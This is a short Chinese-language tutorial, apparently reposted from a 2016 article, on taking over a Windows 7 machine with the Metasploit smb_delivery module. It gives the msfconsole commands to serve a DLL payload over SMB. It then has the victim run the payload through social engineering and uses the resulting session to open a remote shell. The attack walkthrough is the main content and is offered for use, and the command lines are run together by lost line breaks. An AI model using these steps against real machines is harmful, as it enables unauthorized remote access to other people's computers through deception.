標籤:

用DLL文件黑掉遠程Windows PC

01-29

這個模塊服務payload通過SMB服務實現並且提供命令檢索和執行生成的payload。目前支持DLL和Powershell。

利用目標:Windows 7

環境需求:

攻擊機:kailLinux

靶機:windows 7

打開kali終端輸入msfconsole

然後輸入

use exploit/windows/smb/smb_deliverynmsf exploit (smb_delivery)>set srvhost192.168.1.101 (IP of Local Host)nmsf exploit (smb_delivery)>set srvport 445nmsf exploit (smb_delivery)>exploitn

現在,我們已經用社會工程學的辦法將生成的rundll32.exe拷貝到靶機上並運行。然後我們就獲得了靶機的許可權了。

先我們輸入session –i 來列印靶機連接過來的session。

現在這個seesion已經使用sysinfo來獲得系統的信息,然後輸入shell來獲取靶機的命令行窗口。

註:本文參考來源於hackingarticles 原載時間2016年8月9日

推薦閱讀:

工具推薦:22款最流行的計算機取證工具【2017年更新版】
技術分析的流派及其核心內涵之一
Home Lab家庭實驗室搭建之網路配置篇
深度剖析Struts2遠程代碼執行漏洞(CVE-2017-5638)
2017-08-22

TAG:dll | 技术分析 |